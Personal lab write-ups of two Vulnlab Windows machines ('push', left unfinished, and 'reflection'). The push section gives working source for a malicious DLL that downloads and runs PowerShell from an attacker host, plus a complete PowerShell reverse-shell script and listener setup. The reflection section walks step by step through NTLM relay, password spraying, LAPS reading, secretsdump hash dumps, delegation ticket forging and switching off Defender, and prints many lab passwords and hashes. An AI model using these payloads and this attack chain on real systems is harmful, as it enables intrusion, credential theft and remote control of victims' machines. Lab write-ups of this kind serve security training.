vulnlab-push

vulnlab-push

a hard windows machine

preperation

create puck.c on kali box

puck.c contains:

#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:

            system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");


            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

create malicious dll

puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

puckshell.txt contains:

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '192.168.1.136'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

on attacker pc run http listener and nc listener

c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie

test on windows target with

rundll32.exe C:\Payloads\puck.dll,XYZ

If all tests are succesfull, we continue to the writeup.

Writeup :

To abuse clickonce we follow article , we need to upload our SelfService.dll.deploy , which will download and execute a reverse shell.

More to come …\

With shell as kelly.hill we find her credentials in her homefolder

evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!' 
xfreerdp  /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx

we find also  a user dir named SCCM

*Evil-WinRM* PS C:\Users\kelly.hill\documents> curl http://10.8.2.138:8000/SharpSCCM.exe -o SharpSCCM.exe 
*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Connecting to \\127.0.0.1\root\CCM
[!] Could not connect to \\127.0.0.1\root\CCM: Access denied
[+] Completed execution in 00:00:05.3229360

 

Bloodhound Analysis:

bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp  

check machine account quota

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq 
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
LDAP        DC01.push.vl    389    DC01             [+] push.vl\Olivia.Wood:DeployTrust07 
MAQ         DC01.push.vl    389    DC01             [*] Getting the MachineAccountQuota
MAQ         DC01.push.vl    389    DC01             MachineAccountQuota: 10
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/push]

.

vulnlab-reflection

vulnlab-reflection

Reflection is a medium Active Directory chain which consists of three machines, MS01, WS01 and DC01 , from MS01, MSSQL staging credentials were found from smb share, which lead to relaying the NTLM hash on DC01’s smb shares, where the service account had access to the prod share containing credentials for production database, from where we’ll get two domain credentials, abbie.smith having GenericAll on MS01 through which can read the LAPS password and further dumping the Georgia.Price password from credential vault, this user also had GenericAll on WS01, having the full access on MS01, we can perform Resource Based Constrained Delegation (RBCD) and again from dumping we’ll get Rhys.Garner ‘s password, whose password we can reuse on DOM_RGARNER who is a part of domain admin.

Writeup:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares

SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ms01.reflection.vl 445    MS01             [+] reflection.vl\puck: 
SMB         ms01.reflection.vl 445    MS01             [+] Enumerated shares
SMB         ms01.reflection.vl 445    MS01             Share           Permissions     Remark
SMB         ms01.reflection.vl 445    MS01             -----           -----------     ------
SMB         ms01.reflection.vl 445    MS01             ADMIN$                          Remote Admin
SMB         ms01.reflection.vl 445    MS01             C$                              Default share
SMB         ms01.reflection.vl 445    MS01             IPC$            READ            Remote IPC
SMB         ms01.reflection.vl 445    MS01             staging         READ            staging environment
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging      

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

        6261245 blocks of size 4096. 1153753 blocks available
smb: \> cat staging_db.conf
cat: command not found
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf 
user=web_staging
password=Washroom510
db=staging   

mssql enum

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   

guest                public     NULL        NULL        guest           b'2         '   b'00'   

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   

sys                  public     NULL        NULL        NULL            b'4         '    NULL   

SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)>
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE'
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

john svc_web_staging.hash –wordlist=/usr/share/wordlists/rockyou.txt  -> uncrackable

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share . 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []

Next we do a NTLMrelay attack to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!

We trigger it from our sqlshell

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

and in another terminal window on my kali box

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000                     
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
# 

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf 
user=web_prod
password=Tr<redacted>01
db=prod

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL       dc01.reflection.vl 1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL       dc01.reflection.vl 1433   DC01             [+] web_prod:Tribesman201 
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.

sqsh to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'

sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id:       1
name:     abbie.smith
password: CM<redacted>Ew
 
id:       2
name:     dorothy.rose
password: hC<redacted>SJ
 
(2 rows affected)

ldap search

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.

bloodhound

bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp

check machine quota

──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        dc01.reflection.vl 389    DC01             [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ 
MAQ         dc01.reflection.vl 389    DC01             [*] Getting the MachineAccountQuota
MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0

check LAPS

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps 
SMB         DC01            445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        DC01            389    DC01             [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw 
LAPS        DC01            389    DC01             [*] Getting LAPS Passwords
LAPS        DC01            389    DC01             Computer: MS01$                Password: H44<redacted>}xi

check pasword used users on ws01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth
SMB         ws01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    MS01             [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB         ws01.reflection.vl 445    MS01             [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\DC01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\krbtgt:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\MS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\WS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] 

Do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We use the admin account to RDP to the Box and start enumerating it

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx 

on MS01 disable defender upload mimikatz.exe , we find :
Georgia.Price
DBl<redacted>id

RBCD attack op ws01.reflection.com ( via ms01 )

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi

[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'


Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache  

and a secretsdump to ws01.reflection.com

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM 
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
